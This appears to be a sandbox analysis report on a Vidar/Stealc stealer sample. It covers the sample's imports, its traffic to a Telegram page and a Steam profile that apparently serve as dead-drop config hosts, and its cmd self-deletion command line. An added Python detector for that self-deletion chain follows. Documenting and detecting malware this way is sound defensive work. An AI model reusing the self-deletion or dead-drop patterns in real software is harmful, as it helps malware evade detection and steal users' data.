KERNEL32.dll | GetEnvironmentStringsW, FreeEnvironmentStringsW, GetModuleFileNameA, HeapSize, WideCharToMultiByte, IsValidCodePage, GetOEMCP, ExitProcess, SetCriticalSectionSpinCount, FlsAlloc, HeapAlloc, GetCurrentProcess, HeapFree, VirtualFree, GetProcessHeap, WriteFile, VirtualAllocExNuma, Sleep, ReadFile, CreateFileW, lstrcatA, MultiByteToWideChar, GetTempPathW, GetLastError, lstrcmpiA, GetProcAddress, VirtualAlloc, GlobalMemoryStatusEx, ConvertDefaultLocale, lstrcmpiW, GetModuleHandleA, VirtualProtect, CloseHandle, lstrlenA, FreeLibrary, GetThreadContext, SetThreadContext, ReadProcessMemory, VirtualAllocEx, SetHandleCount, VirtualQueryEx, OpenProcess, GetComputerNameA, FileTimeToSystemTime, WaitForSingleObject, GetDriveTypeA, CreateProcessA, CreateDirectoryA, GetLogicalDriveStringsA, CreateThread, CreateFileA, GetFileSize, SetFilePointer, MapViewOfFile, UnmapViewOfFile, lstrcpynA, SystemTimeToFileTime, GetTickCount, GetLocalTime, CreateFileMappingA, GetFileInformationByHandle, lstrcpyA, HeapSetInformation, GetCommandLineA, HeapReAlloc, GetCPInfo, GetLocaleInfoW, LoadLibraryW, InterlockedExchange, SetConsoleCtrlHandler, IsProcessorFeaturePresent, GetCurrentThread, InterlockedDecrement, GetCurrentThreadId, SetLastError, InterlockedIncrement, GetACP, TlsFree, TlsSetValue, GetFileType, QueryPerformanceCounter, GetStartupInfoW, GetCurrentProcessId, GetSystemTimeAsFileTime, LCMapStringW, WriteProcessMemory, GetStringTypeW, TlsGetValue, TlsAlloc, RaiseException, IsValidLocale, EnumSystemLocalesA, GetLocaleInfoA, GetUserDefaultLCID, GetModuleFileNameW, GetStdHandle, GetModuleHandleW, HeapDestroy, HeapCreate, RtlUnwind, EnterCriticalSection, FatalAppExitA, LeaveCriticalSection, DeleteCriticalSection, TerminateProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, EncodePointer, DecodePointer, InitializeCriticalSectionAndSpinCount
USER32.dll | GetDesktopWindow, OpenDesktopA, CreateDesktopA, CloseDesktop, OpenInputDesktop, wsprintfW, IsDialogMessageW, MessageBoxA, GetWindowLongW, ReleaseDC, GetWindowContextHelpId, SetThreadDesktop, RegisterClassW, IsWindowVisible, GetCursorPos, CharToOemA
GDI32.dll | CreateDCA, GetDeviceCaps
ADVAPI32.dll | RegGetValueA, RegOpenKeyExA, GetUserNameA, GetCurrentHwProfileA
SHELL32.dll | SHFileOperationA
ole32.dll | CoInitializeSecurity, CoSetProxyBlanket, CoCreateInstance, CoInitializeEx
OLEAUT32.dll | SysFreeString, VariantClear, VariantInit, SysAllocString
PSAPI.DLL | EnumProcessModules, GetModuleBaseNameA
SHLWAPI.dll |
Language of compilation system | Country where language is spoken | Map
English | United States |
                                                                                                                                                                                                                                                        Dec 16, 2024 10:45:14.742244005 CET49741443192.168.2.7104.102.49.254
                                                                                                                                                                                                                                                        Dec 16, 2024 10:45:14.742316961 CET49741443192.168.2.7104.102.49.254
                                                                                                                                                                                                                                                        Dec 16, 2024 10:45:14.742333889 CET44349741104.102.49.254192.168.2.7
                                                                                                                                                                                                                                                        Dec 16, 2024 10:45:14.742368937 CET49741443192.168.2.7104.102.49.254
                                                                                                                                                                                                                                                        Dec 16, 2024 10:45:14.742387056 CET49741443192.168.2.7104.102.49.254
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 16, 2024 10:45:09.847338915 CET | 52960 | 53 | 192.168.2.7 | 1.1.1.1
Dec 16, 2024 10:45:09.984891891 CET | 53 | 52960 | 1.1.1.1 | 192.168.2.7
Dec 16, 2024 10:45:11.919352055 CET | 60394 | 53 | 192.168.2.7 | 1.1.1.1
Dec 16, 2024 10:45:12.087879896 CET | 53 | 60394 | 1.1.1.1 | 192.168.2.7

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 16, 2024 10:45:09.847338915 CET | 192.168.2.7 | 1.1.1.1 | 0xf1d0 | Standard query (0) | t.me | A (IP address) | IN (0x0001) | false
Dec 16, 2024 10:45:11.919352055 CET | 192.168.2.7 | 1.1.1.1 | 0x7965 | Standard query (0) | steamcommunity.com | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 16, 2024 10:45:09.984891891 CET | 1.1.1.1 | 192.168.2.7 | 0xf1d0 | No error (0) | t.me | | 149.154.167.99 | A (IP address) | IN (0x0001) | false
Dec 16, 2024 10:45:12.087879896 CET | 1.1.1.1 | 192.168.2.7 | 0x7965 | No error (0) | steamcommunity.com | | 104.102.49.254 | A (IP address) | IN (0x0001) | false

• t.me
• steamcommunity.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49735 | 149.154.167.99 | 443 | 6420 | C:\Users\user\Desktop\njrtdhadawt.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-16 09:45:11 UTC | 85 | OUT | GET /asg7rd HTTP/1.1
Host: t.me
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-16 09:45:11 UTC | 511 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Mon, 16 Dec 2024 09:45:11 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 9539
Connection: close
Set-Cookie: stel_ssid=338d2b38f28578018d_12362536948919234430; expires=Tue, 17 Dec 2024 09:45:11 GMT; path=/; samesite=None; secure; HttpOnly
Pragma: no-cache
Cache-control: no-store
X-Frame-Options: ALLOW-FROM https://web.telegram.org
Content-Security-Policy: frame-ancestors https://web.telegram.org
Strict-Transport-Security: max-age=35768000
2024-12-16 09:45:11 UTC | 9539 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 61 73 67 37 72 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74
Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @asg7rd</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.parent


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.7 | 49741 | 104.102.49.254 | 443 | 6420 | C:\Users\user\Desktop\njrtdhadawt.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-16 09:45:13 UTC | 119 | OUT | GET /profiles/76561199794498376 HTTP/1.1
Host: steamcommunity.com
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-16 09:45:14 UTC | 1917 | IN | HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=UTF-8
Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https:// [TRUNCATED]
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache
Date: Mon, 16 Dec 2024 09:45:14 GMT
Content-Length: 35543
Connection: close
Set-Cookie: sessionid=2a0ae2110795d9c095f145d0; Path=/; Secure; SameSite=None
Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
2024-12-16 09:45:14 UTC | 14467 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e
Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
2024-12-16 09:45:14 UTC | 16384 | IN | Data Raw: 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 77 6f 72 6b 73 68 6f 70 2f 22 3e 0a 09 09 09 09 09 09 57 6f 72 6b 73 68 6f 70 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 73 75 62 6d 65 6e 75 69 74 65 6d 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 6d 61 72 6b 65 74 2f 22 3e 0a 09 09 09 09 09 09 4d 61 72 6b 65 74 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 73 75 62 6d 65 6e 75 69 74 65 6d 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f
Data Ascii: " href="https://steamcommunity.com/workshop/">Workshop</a><a class="submenuitem" href="https://steamcommunity.com/market/">Market</a><a class="submenuitem" href="https://steamcommunity.com/
2024-12-16 09:45:14 UTC | 3768 | IN | Data Raw: 69 6e 66 6f 22 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 62 61 64 67 65 69 6e 66 6f 5f 62 61 64 67 65 5f 61 72 65 61 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 64 61 74 61 2d 70 61 6e 65 6c 3d 22 7b 26 71 75 6f 74 3b 66 6f 63 75 73 61 62 6c 65 26 71 75 6f 74 3b 3a 74 72 75 65 2c 26 71 75 6f 74 3b 63 6c 69 63 6b 4f 6e 41 63 74 69 76 61 74 65 26 71 75 6f 74 3b 3a 74 72 75 65 7d 22 20 63 6c 61 73 73 3d 22 70 65 72 73 6f 6e 61 5f 6c 65 76 65 6c 5f 62 74 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 70 72 6f 66 69 6c 65 73 2f 37 36 35 36 31 31 39 39 37 39 34 34 39 38 33 37 36 2f 62 61 64 67 65 73 22 3e
Data Ascii: info"><div class="profile_header_badgeinfo_badge_area"><a data-panel="{&quot;focusable&quot;:true,&quot;clickOnActivate&quot;:true}" class="persona_level_btn" href="https://steamcommunity.com/profiles/76561199794498376/badges">
2024-12-16 09:45:14 UTC | 924 | IN | Data Raw: 33 41 25 32 46 25 32 46 77 77 77 2e 67 65 6f 6e 61 6d 65 73 2e 6f 72 67 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 72 65 6c 3d 22 20 6e 6f 6f 70 65 6e 65 72 22 3e 67 65 6f 6e 61 6d 65 73 2e 6f 72 67 3c 2f 61 3e 2e 09 09 09 09 09 3c 62 72 3e 0a 09 09 09 09 09 09 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 76 61 6c 76 65 5f 6c 69 6e 6b 73 22 3e 0a 09 09 09 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 70 72 69 76 61 63 79 5f 61 67 72 65 65 6d 65 6e 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 50 72 69 76 61 63 79 20 50 6f 6c 69 63 79 3c 2f 61 3e 0a 09 09 09 09 09 09 09 26 6e 62 73 70 3b 20 7c 20 26 6e 62 73 70 3b 3c 61 20 68 72 65 66 3d 22
Data Ascii: 3A%2F%2Fwww.geonames.org" target="_blank" rel=" noopener">geonames.org</a>.<br><span class="valve_links"><a href="http://store.steampowered.com/privacy_agreement/" target="_blank">Privacy Policy</a>&nbsp; | &nbsp;<a href="


Target ID: 0
Start time: 04:44:45
Start date: 16/12/2024
Path: C:\Users\user\Desktop\njrtdhadawt.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\njrtdhadawt.exe"
Imagebase: 0xfe0000
File size: 965'632 bytes
MD5 hash: 96E4917EA5D59ECA7DD21AD7E7A03D07
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
• Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
• Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
• Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000000.1254479624.000000000100F000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
• Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000000.1254479624.000000000100F000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000000.1254479624.000000000100F000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        Has exited:true

Target ID:11
Start time:06:11:53
Start date:16/12/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\Desktop\njrtdhadawt.exe" & rd /s /q "C:\ProgramData\AAKJKJDGCGDB" & exit
Imagebase:0x410000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true
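The cmd.exe command line recorded for Target ID 11 is the "Self deletion via cmd or bat file" behaviour listed in the Signatures: the dropper waits (timeout /t 10) so its own process can exit, deletes its own image (del /f /q "<parent image>") and removes its working directory under C:\ProgramData (rd /s /q). The following Python is an added example, not part of the Joe Sandbox report, showing how to pick that chain out of process-creation telemetry. It assumes Sysmon-style field names (ParentImage, Image, CommandLine); the sample records are constructed for the example, with only the first command line and its paths taken from the report above.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample process-creation records (Sysmon Event ID 1 style field names,
# which is an assumption). Only the first CommandLine/ParentImage pair is taken from
# the report; the other two records are benign look-alikes invented for contrast.
SAMPLE_EVENTS = [
    {
        "ParentImage": r"C:\Users\user\Desktop\njrtdhadawt.exe",
        "Image": r"C:\Windows\SysWOW64\cmd.exe",
        "CommandLine": r'"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\Desktop\njrtdhadawt.exe" & rd /s /q "C:\ProgramData\AAKJKJDGCGDB" & exit',
    },
    {   # benign: an installer removing its own temp directory, nothing deletes the parent
        "ParentImage": r"C:\Program Files\Example\setup.exe",
        "Image": r"C:\Windows\System32\cmd.exe",
        "CommandLine": r'cmd.exe /c rd /s /q "C:\Users\user\AppData\Local\Temp\setup_tmp"',
    },
    {   # benign: a wrapper that only waits and exits
        "ParentImage": r"C:\Windows\System32\svchost.exe",
        "Image": r"C:\Windows\System32\cmd.exe",
        "CommandLine": r"cmd.exe /c timeout /t 5 & exit",
    },
]

# "<anything>cmd.exe" (quoted or bare) followed by /c or /k and the payload that cmd runs.
CMD_PAYLOAD_RE = re.compile(r'^\s*(?:"[^"]*cmd\.exe"|\S*cmd\.exe)\s+/[ck]\s+(.*)$', re.IGNORECASE)
# cmd tokens: a double-quoted string (quotes stripped) or a run of non-whitespace.
TOKEN_RE = re.compile(r'"([^"]*)"|(\S+)')


@dataclass
class SelfDeleteFinding:
    delay_seconds: Optional[int]   # value of "timeout /t N", if present
    deleted_paths: List[str]       # arguments of del/erase
    removed_dirs: List[str]        # arguments of rd/rmdir


def split_chain(payload: str) -> List[str]:
    """Split a cmd.exe payload on '&' / '&&' that are not inside double quotes."""
    parts, cur, in_quote, i = [], [], False, 0
    while i < len(payload):
        ch = payload[i]
        if ch == '"':
            in_quote = not in_quote
            cur.append(ch)
        elif ch == "&" and not in_quote:
            parts.append("".join(cur).strip())
            cur = []
            if i + 1 < len(payload) and payload[i + 1] == "&":
                i += 1  # treat "&&" as a single separator
        else:
            cur.append(ch)
        i += 1
    parts.append("".join(cur).strip())
    return [p for p in parts if p]


def tokens(command: str) -> List[str]:
    return [q or s for q, s in TOKEN_RE.findall(command)]


def analyze(event: dict) -> Optional[SelfDeleteFinding]:
    """Return a finding when a cmd.exe child deletes its parent's image, else None."""
    m = CMD_PAYLOAD_RE.match(event.get("CommandLine", ""))
    if not m:
        return None
    delay, deleted, removed = None, [], []
    for command in split_chain(m.group(1)):
        t = tokens(command)
        if not t:
            continue
        name = t[0].lower()
        if name == "timeout":
            for j in range(1, len(t)):
                if t[j].lower() == "/t" and j + 1 < len(t) and t[j + 1].isdigit():
                    delay = int(t[j + 1])
                elif t[j].isdigit() and delay is None:
                    delay = int(t[j])
        elif name in ("del", "erase"):
            deleted += [a for a in t[1:] if not a.startswith("/")]
        elif name in ("rd", "rmdir"):
            removed += [a for a in t[1:] if not a.startswith("/")]
    # The discriminating condition: one of the deleted paths is the parent's own image.
    parent = event.get("ParentImage", "").lower()
    if not any(p.lower() == parent for p in deleted):
        return None
    return SelfDeleteFinding(delay, deleted, removed)


def scan(events: List[dict]) -> List[SelfDeleteFinding]:
    return [f for f in (analyze(e) for e in events) if f is not None]


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

The check keys on the parent/child relationship rather than on the literal strings, so it also catches variants that use erase or rmdir, or a different delay; tuning it to require the rd of a directory under C:\ProgramData would track this sample more tightly but would miss droppers that only delete themselves.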

Target ID:12
Start time:06:11:53
Start date:16/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff75da10000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:13
Start time:06:11:53
Start date:16/12/2024
Path:C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):true
Commandline:timeout /t 10
Imagebase:0x840000
File size:25'088 bytes
MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true


Execution Graph

Execution Coverage:3.4%
Dynamic/Decrypted Code Coverage:0%
Signature Coverage:3.9%
Total number of Nodes:2000
Total number of Limit Nodes:35
execution_graph: node dump of the interactive graph widget, not reproduced. The call chains recoverable from the node labels (addresses as the graph shows them):
• 0xff7f0f -> 0xffcab4: IsDebuggerPresent; 0xffcefe: SetUnhandledExceptionFilter, UnhandledExceptionFilter; 0xffcf23 (__call_reportfault): GetCurrentProcess, TerminateProcess
• 0x6cd60d50 (CRT startup of a loaded module: __DllMainCRTStartup@12, dllmain_raw, dllmain_crt_dispatch): GetSystemTimeAsFileTime, GetCurrentThreadId, GetCurrentProcessId, QueryPerformanceCounter (___get_entropy); IsProcessorFeaturePresent, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter; InitializeSListHead; EnterCriticalSection / LeaveCriticalSection; GetStdHandle, GetFileType; RtlAllocateHeap
• 0xff7f30 -> 0xfe2b58, and again at 0xfe2f03: 0xfe47d9 (GetProcessHeap, HeapAlloc, then lstrlenA at 0xfe4809) called repeatedly in sequence, one round per entry
• 0xff80c5 -> 0xff801c: GetPEB; 0xff82c6: LoadLibraryA (five calls), then GetProcAddress at 0xff8325, 0xff8340, 0xff8372, 0xff838d and 0xff83a8 (dynamic API resolution)
• 0xfe10e0: GetCurrentProcess, VirtualAllocExNuma, with one branch to 0xfe1088 (VirtualAlloc, _memset, VirtualFree at 0xfe10c5) and the other to 0xfe1101: ExitProcess
• 0xfe1274: _memset, 13 API calls, then 0xff0ea8: GetProcessHeap, HeapAlloc, GetComputerNameA and 0xff0e76: GetProcessHeap, HeapAlloc, GetUserNameA; one branch reaches 0xfe13d2: ExitProcess
• 0xfe147a, 0xfe1492 and 0xfe14e9 -> 0xfe149d: GetPEB followed by a lstrcmpiW loop at 0xfe14c9
• 0xfe1656: GetTempPathW, wsprintfW, CreateFileW, GetProcessHeap, RtlAllocateHeap, _time64, srand, rand, WriteFile, CloseHandle, CreateFileW, ReadFile, GetProcessHeap, RtlFreeHeap, CloseHandle (write/read round trip on a temp file)
• 0xff721e: string helpers built on lstrcpyA, lstrlenA and lstrcatA (0xff070a, 0xff082c, 0xff07b0, 0xff076c, 0xff073c, 0xff07ea); 0xff72b1: OpenEventA, CloseHandle, 0xff72c1: CreateEventA; 0xff83d2 (121 API calls); 0xff1e6d; 0xff74e7: CreateDirectoryA; 0xff7ccf; 0xff75a0: InternetOpenA, InternetOpenA; 0xff0bc5: GetWindowsDirectoryA; 0xfe4b20; 0xfe5f2b (43 API calls); 0xff341d and 0xff3554: strtok_s; 0xff3d63; 0xfe5229; 0xfeec70
57695 fe47d9 3 API calls 57694->57695 57696 fe3692 57695->57696 57697 fe47d9 3 API calls 57696->57697 57698 fe36a9 57697->57698 57699 fe47d9 3 API calls 57698->57699 57700 fe36c0 57699->57700 57701 fe47d9 3 API calls 57700->57701 57702 fe36d4 57701->57702 57703 fe47d9 3 API calls 57702->57703 57704 fe36ea 57703->57704 57705 fe47d9 3 API calls 57704->57705 57706 fe3704 57705->57706 57707 fe47d9 3 API calls 57706->57707 57708 fe371b 57707->57708 57709 fe47d9 3 API calls 57708->57709 57710 fe3732 57709->57710 57711 fe47d9 3 API calls 57710->57711 57712 fe3749 57711->57712 57713 fe47d9 3 API calls 57712->57713 57714 fe3760 57713->57714 57715 fe47d9 3 API calls 57714->57715 57716 fe3777 57715->57716 57717 fe47d9 3 API calls 57716->57717 57718 fe378b 57717->57718 57719 fe47d9 3 API calls 57718->57719 57720 fe37a2 57719->57720 57721 fe47d9 3 API calls 57720->57721 57722 fe37bc 57721->57722 57723 fe47d9 3 API calls 57722->57723 57724 fe37d3 57723->57724 57725 fe47d9 3 API calls 57724->57725 57726 fe37e7 57725->57726 57727 fe47d9 3 API calls 57726->57727 57728 fe37fb 57727->57728 57729 fe47d9 3 API calls 57728->57729 57730 fe3812 57729->57730 57731 fe47d9 3 API calls 57730->57731 57732 fe3829 57731->57732 57733 fe47d9 3 API calls 57732->57733 57734 fe3840 57733->57734 57735 fe47d9 3 API calls 57734->57735 57736 fe3857 57735->57736 57737 fe47d9 3 API calls 57736->57737 57738 fe3871 57737->57738 57739 fe47d9 3 API calls 57738->57739 57740 fe3888 57739->57740 57741 fe47d9 3 API calls 57740->57741 57742 fe389f 57741->57742 57743 fe47d9 3 API calls 57742->57743 57744 fe38b6 57743->57744 57745 fe47d9 3 API calls 57744->57745 57746 fe38cc 57745->57746 57747 fe47d9 3 API calls 57746->57747 57748 fe38e3 57747->57748 57749 fe47d9 3 API calls 57748->57749 57750 fe38f7 57749->57750 57751 fe47d9 3 API calls 57750->57751 57752 fe390e 57751->57752 57753 fe47d9 3 API calls 57752->57753 57754 fe3928 57753->57754 57755 fe47d9 3 API calls 57754->57755 57756 fe393f 57755->57756 57757 fe47d9 3 
API calls 57756->57757 57758 fe3956 57757->57758 57759 fe47d9 3 API calls 57758->57759 57760 fe396d 57759->57760 57761 fe47d9 3 API calls 57760->57761 57762 fe3984 57761->57762 57763 fe47d9 3 API calls 57762->57763 57764 fe399b 57763->57764 57765 fe47d9 3 API calls 57764->57765 57766 fe39b2 57765->57766 57767 fe47d9 3 API calls 57766->57767 57768 fe39c9 57767->57768 57769 fe47d9 3 API calls 57768->57769 57770 fe39e3 57769->57770 57771 fe47d9 3 API calls 57770->57771 57772 fe39fa 57771->57772 57773 fe47d9 3 API calls 57772->57773 57774 fe3a11 57773->57774 57775 fe47d9 3 API calls 57774->57775 57776 fe3a28 57775->57776 57777 fe47d9 3 API calls 57776->57777 57778 fe3a3f 57777->57778 57779 fe47d9 3 API calls 57778->57779 57780 fe3a56 57779->57780 57781 fe47d9 3 API calls 57780->57781 57782 fe3a6d 57781->57782 57783 fe47d9 3 API calls 57782->57783 57784 fe3a81 57783->57784 57785 fe47d9 3 API calls 57784->57785 57786 fe3a9b 57785->57786 57787 fe47d9 3 API calls 57786->57787 57788 fe3ab2 57787->57788 57789 fe47d9 3 API calls 57788->57789 57790 fe3ac8 57789->57790 57791 fe47d9 3 API calls 57790->57791 57792 fe3adf 57791->57792 57793 fe47d9 3 API calls 57792->57793 57794 fe3af6 57793->57794 57795 fe47d9 3 API calls 57794->57795 57796 fe3b0d 57795->57796 57797 fe47d9 3 API calls 57796->57797 57798 fe3b24 57797->57798 57799 fe47d9 3 API calls 57798->57799 57800 fe3b3b 57799->57800 57801 fe47d9 3 API calls 57800->57801 57802 fe3b52 57801->57802 57803 fe47d9 3 API calls 57802->57803 57804 fe3b66 57803->57804 57805 fe47d9 3 API calls 57804->57805 57806 fe3b7d 57805->57806 57807 fe47d9 3 API calls 57806->57807 57808 fe3b94 57807->57808 57809 fe47d9 3 API calls 57808->57809 57810 fe3bab 57809->57810 57811 fe47d9 3 API calls 57810->57811 57812 fe3bc2 57811->57812 57813 fe47d9 3 API calls 57812->57813 57814 fe3bd9 57813->57814 57815 fe47d9 3 API calls 57814->57815 57816 fe3bf0 57815->57816 57817 fe47d9 3 API calls 57816->57817 57818 fe3c0a 57817->57818 57819 fe47d9 3 API calls 
57818->57819 57820 fe3c21 57819->57820 57821 fe47d9 3 API calls 57820->57821 57822 fe3c38 57821->57822 57823 fe47d9 3 API calls 57822->57823 57824 fe3c4f 57823->57824 57825 fe47d9 3 API calls 57824->57825 57826 fe3c66 57825->57826 57827 fe47d9 3 API calls 57826->57827 57828 fe3c7d 57827->57828 57829 fe47d9 3 API calls 57828->57829 57830 fe3c94 57829->57830 57831 fe47d9 3 API calls 57830->57831 57832 fe3ca8 57831->57832 57833 fe47d9 3 API calls 57832->57833 57834 fe3cc2 57833->57834 57835 fe47d9 3 API calls 57834->57835 57836 fe3cd9 57835->57836 57837 fe47d9 3 API calls 57836->57837 57838 fe3cf0 57837->57838 57839 fe47d9 3 API calls 57838->57839 57840 fe3d07 57839->57840 57841 fe47d9 3 API calls 57840->57841 57842 fe3d1d 57841->57842 57843 fe47d9 3 API calls 57842->57843 57844 fe3d34 57843->57844 57845 fe47d9 3 API calls 57844->57845 57846 fe3d48 57845->57846 57847 fe47d9 3 API calls 57846->57847 57848 